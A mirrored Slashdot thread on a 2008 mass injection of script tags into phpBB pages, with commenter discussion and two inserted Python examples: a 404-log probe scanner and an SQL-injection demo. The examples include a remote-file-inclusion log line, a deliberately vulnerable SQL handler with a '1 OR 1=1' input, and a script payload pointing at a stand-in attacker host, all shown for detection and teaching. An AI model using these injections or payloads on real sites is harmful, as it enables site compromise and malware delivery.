Slashdot Mirror


Mass Website Hack Compromises 200,000 Sites

Stony Stevenson writes "Hot on the heels of a recent hack in which 10,000 sites were compromised, researchers have disclosed a new large-scale attack. Researchers at McAfee estimated that the attack has been active for roughly one week, and in that time frame has managed to place itself on roughly 200,000 web pages. Most of the infected pages are running the phpBB forum software, said McAfee. The compromised pages are embedded with a Javascript file that links to the site hosting the attack."

12 of 153 comments

  1. Pages, not sites by Dan East · · Score: 5, Informative

    The title (which appears to be the only part the submitter actually "authored") is incorrect and conflicts with the text it quotes. An estimated 200,000 pages (most likely individual posts in phpBB forums) are out there, not sites.

    According to this video, the pages are being inserted via SQL injection attacks. The 200k pages figure is based on a Google search (he does not reveal what criteria he is searching for) which came back with 150k hits. So it is not clear how many actual sites are compromised. One could assume that once a phpBB site is compromised, every page of every thread, which is analogous to individual web pages, would redirect to the worm download site. A popular forum could easily have several thousand thread-pages. In fact, every single page would probably be redirecting, which would include each user's summary page (which would be in the thousands for even a small site). So a small number of sites could be accounting for all the 200k pages.

    Also, in the video it is clear from the url that it is a phpBB2 site that is compromised. phpBB is currently at a major version of 3.

    --
    Better known as 318230.
  2. Re:Please be more forthcoming by Anonymous Coward · · Score: 2, Informative

    For a properly maintained phpBB site, this isn't that big of a deal. As a maintainer for a site which uses phpBB, I can tell you that I have seen this attempted for months. I believe phpBB is mentioned directly because it seems there are programs which allow individuals to create forum accounts and post messages using an automated script. The scripts post messages to visit a (usually) pornographic site. Once you connect, you are presented with a page with a display which mimics YouTube.com; however, a pop-up is displayed saying you cannot play the video without the proper video codec, and offers to allow you to download the codec from the site (usually codec.exe). Once you download and open the program, you are infected.

    When I first started seeing this happen several months ago, I started experimenting with the security settings of the phpBB program: enabling the captcha, and requiring administrative account activation. Since no one can create an account without my permission, this problem disappeared on my forum. This isn't practical with all forums, YMMV.

  3. Re:Turn off computer or modem when not using by Mortimer82 · · Score: 2, Informative

    Tell him to set up power saving correctly. Although my computer needs to stay connected to the mains for suspend-to-RAM to work, it's for all intents and purposes "turned off". It takes 7 seconds (at most) to go to sleep and a few seconds to wake up, and I never have a problem.

  4. Re:200,000 Sites Hacked by CrossChris · · Score: 3, Informative

    Actually, that's not quite true: my brother's website was abused like this, which resulted in Google referrals warning that "this site contains malicious software". His company ranking was Number 1 in every Google search for his type of service. It's proving very expensive for him.

  5. Re:Internet-connection license? by SL Baur · · Score: 4, Informative

    "How about this plan: anybody, who wishes to maintain an Internet-reachable computer, needs to be licensed." Let's just not go there, O.K.? There isn't anyone I would trust as a licensing body, and when you bring in the inevitable licensing fees ... er, let's just not go there.
  6. Re:Please be more forthcoming by Anonymous Coward · · Score: 2, Informative

    Here too, we have a threat which is already running wild. Thousands of websites are being attacked. Unfortunately, this article, like many which abound in the security theatre online media, is long on consequences and short on details. Someone knows how the attack spreads, but they aren't sharing the means of stopping the attack. We know exactly how it spreads: php. Don't get me wrong, php is a good language as of 5.x. However, to write something in it that's not simple to exploit you actually have to know what you're doing, which is not the case for the majority of php developers. Look at the majority of php code out there, it's no surprise at all why it's so security plagued: the developers simply have no clue and php doesn't protect you. Hell, even many tutorials out there have security exploits in them.

    If you absolutely have to run a third party php script, do not under any circumstance run it without both the Suhosin patch and the Suhosin module. Running ModSecurity on top of that is also a good idea.

    Always treat third party php code as hostile.
  7. Re:Please be more forthcoming by Hynee · · Score: 2, Informative
    That's bullshit, phpBB was hit ~2-3 years ago with the self-propagating worm Santy, which exploited a bug in a PHP function (unserialize IIRC). phpBB was essentially a victim--the bug was in PHP itself, and phpBB is a widely deployed open source BB, and the developers had removed all usage of the compromised function after the bug was disclosed and before the Santy worm hit. (Site owners who failed to upgrade were hit, a large percentage.)

    I haven't heard of any glaring security issues with phpBB before or since, excluding the odd SEC fix. phpBB isn't vulnerable to SQL injection tricks.

    --
    Damn, I already moderated this topic. Now I'll have to log in with my sock puppet to comment.
  8. Re:Good news for us, I guess... by ncryptd · · Score: 2, Informative

    It's the same reason hackers devote so much time exploiting Windows - more bang for your buck. phpBB is everywhere. It's not so much that as it is the fact that phpBB 1.x/2.x have an appalling number of security flaws. It's wildly insecure, so much so that there's actually a mod (crackertracker) designed to help harden installations against the inevitable attacks.

    I'd be willing to bet that most of the phpBB installs were 1.x/2.x -- the phpBB team actually paid for an audit of the 3.x line, and so far it seems to be much more secure code.
  9. Re:But most people don't know better... by Tarwn · · Score: 3, Informative

    Ok, what?

    First, I'm not sure if you're talking ASP or ASP.Net, but either way the vast majority of your comment can be shortened to:
    There are lots of PHP packages out there. People think they are safe because they are not MS. PHP packages should be re-written in ASP. PHP breaks due to updates but ASP updates better, therefore ASP is a better choice. PHP isn't inherently insecure, it's the packages.

    Your entire statement boils down to this logic:
    1) There are a lot of insecure Packages in PHP
    2) It's not an insecurity in PHP, it's an insecurity in the packages
    3) ASP updates better than PHP

    You're comparing apples (ASP) to oranges (PHP Packages). I have no experience of how well or poorly the security of packages in PHP performs against the security of packages in ASP.Net; we would have to pick a large pool of them to find out. And just because Windows Update makes updates available for ASP.Net does not mean that people actually are that willing to reboot their web farms for every update that appears. You're saying the problem is bad coding and that ASP solves it; I would beg to differ.

    And here is my anecdotal comment:
    I have answered thousands of ASP questions (ASP used to be my primary web 'language') as well as written/re-written many sites and over time I have seen a lot of site examples and snippets that would leave a page wide open or in a position to break on regular occasions (or just plain didn't work). On the other hand I have worked with several PHP packages that were solidly put together and worked against a range of PHP versions. PHP must be better because I haven't personally seen anywhere near as many errors in coding as I have in ASP. None of the first several thousand ASP posts would work at all against the next version of the language (ASP 3 => ASP.Net) and needed to be rewritten from scratch, but most or all of the packages I used with PHP 4 worked just fine with PHP 5.

    --
    Whee signature.
  10. yeah, I find stuff like this in my logs by JoeCommodore · · Score: 2, Informative

    Looking through my 404 logs I get a bunch of kiddie auto scripts either looking to BB spam or hack in, here are some items which I figure are popular entry routes:

    ///include/print_category.php
    /forum/index.php
    /bbs/include/print_category.php
    /functions.php
    /board/index.php
    /forums/index.php
    /phpbb2/index.php
    //calendar//tools/send_reminders.php
    //skin/zero_vote/error.php (lots of these)
    /skin/zero_vote/ask_password.php
    //support/mailling/maillist/inc/initdb.php (a few of these)
    /function.main
    /comments.php
    /MSOffice/cltreq.asp
    /cgi-bin/bbs/read.cgi
    //include/write.php

    --
    "Enjoy what you're doing! If it becomes drudgery, you're doing it wrong!" - Jim Butterfield
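The post above is a list of paths scraped from 404 logs by eye. The script below is an added example (mine, not the poster's tooling) that does the same check over Apache combined-format log lines: it counts 404s against the probe paths listed in that comment per source IP, so a single scanner walking the whole list stands out, and it only counts a path as a probe when the request actually 404'd, because a path like /comments.php may legitimately exist on your own site. As a labelled generalization beyond the post, it also flags query strings that point a parameter at a remote URL, the usual payload carried to paths like these. The log lines are constructed for the example; the IPs are documentation ranges.

```python
"""Scan Apache combined-format logs for automated probes against the forum
paths listed in the post above.  Added example; the log lines are constructed."""
import re
from collections import Counter, defaultdict

# Probe paths copied from the post's 404 list, normalised to one leading slash.
PROBE_PATHS = {
    "/include/print_category.php",
    "/forum/index.php",
    "/bbs/include/print_category.php",
    "/functions.php",
    "/board/index.php",
    "/forums/index.php",
    "/phpbb2/index.php",
    "/calendar/tools/send_reminders.php",
    "/skin/zero_vote/error.php",
    "/skin/zero_vote/ask_password.php",
    "/support/mailling/maillist/inc/initdb.php",
    "/function.main",
    "/comments.php",
    "/MSOffice/cltreq.asp",
    "/cgi-bin/bbs/read.cgi",
    "/include/write.php",
}

# Apache "combined" log format: ip ident user [ts] "METHOD path proto" status size "ref" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Generalisation beyond the post (an assumption, not something it states):
# a query-string parameter set to a remote URL is the classic payload for these probes.
RFI_RE = re.compile(r"=((?:https?|ftp)://[^&\s]+)", re.IGNORECASE)

# Constructed sample log; 203.0.113.5 walks several listed paths with one remote-URL
# parameter, 198.51.100.77 hits one, 192.0.2.8 fetches a page the site really serves.
SAMPLE_LOG = """\
203.0.113.5 - - [14/Mar/2008:02:11:03 +0000] "GET //skin/zero_vote/error.php?dir=http://198.51.100.9/x.txt? HTTP/1.1" 404 212 "-" "libwww-perl/5.805"
203.0.113.5 - - [14/Mar/2008:02:11:04 +0000] "GET /phpbb2/index.php HTTP/1.1" 404 212 "-" "libwww-perl/5.805"
203.0.113.5 - - [14/Mar/2008:02:11:04 +0000] "GET /forum/index.php HTTP/1.1" 404 212 "-" "libwww-perl/5.805"
198.51.100.77 - - [14/Mar/2008:02:15:40 +0000] "GET /index.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.77 - - [14/Mar/2008:02:15:41 +0000] "GET /MSOffice/cltreq.asp HTTP/1.1" 404 212 "-" "Mozilla/5.0"
192.0.2.8 - - [14/Mar/2008:03:01:00 +0000] "GET /comments.php?id=3 HTTP/1.1" 200 880 "-" "Mozilla/5.0"
"""


def normalise_path(raw):
    """Drop the query string and collapse the doubled slashes seen in the post's list."""
    path = raw.split("?", 1)[0]
    return re.sub(r"/{2,}", "/", path)


def scan(log_text):
    """Return (per_ip, rfi): per_ip maps source IP -> Counter of listed paths that
    404'd; rfi lists (ip, path, remote_url) for requests carrying a remote-URL parameter."""
    per_ip = defaultdict(Counter)
    rfi = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # malformed or non-combined line; skip rather than guess
        path = normalise_path(m["path"])
        query = m["path"].partition("?")[2]
        remote = RFI_RE.search(query)
        if remote:
            rfi.append((m["ip"], path, remote.group(1)))
        # Only a miss against a listed path is a probe; a 200 means the page is really yours.
        if m["status"] == "404" and path in PROBE_PATHS:
            per_ip[m["ip"]][path] += 1
    return dict(per_ip), rfi


def top_sources(per_ip, threshold=2):
    """Source IPs with at least `threshold` probe hits, busiest first: block-list candidates."""
    ranked = sorted(per_ip.items(), key=lambda kv: -sum(kv[1].values()))
    return [ip for ip, hits in ranked if sum(hits.values()) >= threshold]


if __name__ == "__main__":
    per_ip, rfi = scan(SAMPLE_LOG)
    for ip, hits in per_ip.items():
        print(ip, sum(hits.values()), dict(hits))
    for ip, path, url in rfi:
        print("remote-URL parameter from", ip, "on", path, "->", url)
    print("candidates:", top_sources(per_ip))
```

Feed it a real log with `scan(open("access_log").read())`; the threshold in `top_sources` is deliberately low because a legitimate visitor rarely 404s on two different entries from that list.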
  11. Re:Good news for us, I guess... by wytcld · · Score: 1, Informative

    The problem is the phpBB developers just don't much care. I say this as someone using it for years now. Just a few months ago I found some dangerous file permissions in it, reported those, and got brushed aside with a response like "If it were an important security issue the core developers would have already taken care of it."

    Fscking idiots. I still use it. But I've done extensive custom patching to make it (relatively) safe. The project maintainers just can't be bothered to listen to criticism and get smarter. Musta been born with the genius light on in their skulls.

    --
    "with their freedom lost all virtue lose" - Milton
  12. Security hole actually in Fully Modded phpBB by Hynee · · Score: 2, Informative
    As reported in Secunia, the SQL injection bug was found in Fully Modded phpBB on 12-Mar, see here.

    The Fully Modded phpBB website is down, but it is basically a fork or extension of the base phpBB code, which remains secure.

    I know I've labored the point about phpBB not being vulnerable to this kind of attack, but it really is built from the ground up for security. This exploit does not affect phpBB, just the heavily modified fork "Fully Modded phpBB".

    --
    Damn, I already moderated this topic. Now I'll have to log in with my sock puppet to comment.
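Comment 1 describes pages being altered through SQL injection so that every thread page carries a script tag, and comment 12 places the injectable query in Fully Modded phpBB. Neither gives the bug itself, so the following is an added example of the general pattern rather than that code: a hypothetical "edit post" handler that escapes the quoted string but pastes the numeric id into the SQL unquoted, letting `1 OR 1=1` stamp one script tag into every stored post, beside the fixed handler (type check plus bound parameters) and the output encoding that stops stored text from ever becoming markup. The table, the handler names and the payload URL are all constructed for the example; this is not phpBB's schema.

```python
"""Added example, not phpBB or Fully Modded phpBB code: how one injectable
'edit post' query turns every stored post into a script carrier, and the fixes."""
import html
import sqlite3

# Constructed payload; the real attack hosts are not named on this page.
PAYLOAD = '<script src="http://attacker.invalid/attack.js"></script>'


def setup_db():
    """In-memory forum with two ordinary posts (hypothetical schema)."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE posts (id INTEGER PRIMARY KEY, subject TEXT, body TEXT)")
    con.executemany(
        "INSERT INTO posts (subject, body) VALUES (?, ?)",
        [("Welcome", "Hello everyone"), ("Rules", "Be nice")],
    )
    con.commit()
    return con


def update_post_vulnerable(con, post_id, body):
    """Vulnerable handler: the body's quotes are doubled, which looks like enough,
    but post_id is interpolated unquoted, so 'WHERE id = 1 OR 1=1' matches every row.
    Returns the number of rows changed."""
    sql = "UPDATE posts SET body = '%s' WHERE id = %s" % (body.replace("'", "''"), post_id)
    cur = con.execute(sql)
    con.commit()
    return cur.rowcount


def update_post_safe(con, post_id, body):
    """Fixed handler: reject a non-integer id before it reaches SQL, and bind both
    values as parameters so neither is ever parsed as SQL text."""
    post_id = int(post_id)  # raises ValueError on '1 OR 1=1'
    cur = con.execute("UPDATE posts SET body = ? WHERE id = ?", (body, post_id))
    con.commit()
    return cur.rowcount


def render_post(body):
    """Output encoding: whatever is stored, it is emitted as text, not as markup."""
    return '<div class="post">%s</div>' % html.escape(body)


def all_bodies(con):
    """Post bodies in id order, for inspecting what an update actually touched."""
    return [row[0] for row in con.execute("SELECT body FROM posts ORDER BY id")]


if __name__ == "__main__":
    con = setup_db()
    print("vulnerable handler changed", update_post_vulnerable(con, "1 OR 1=1", PAYLOAD), "rows")
    print(all_bodies(con))
    con = setup_db()
    try:
        update_post_safe(con, "1 OR 1=1", PAYLOAD)
    except ValueError as exc:
        print("safe handler rejected the id:", exc)
    print(all_bodies(con))
    print(render_post(PAYLOAD))
```

The two defenses are independent: parameter binding stops the attacker from reaching posts they do not own, and output encoding means that even a script tag an attacker is allowed to store in their own post renders as harmless text instead of loading a file from the attacker's site.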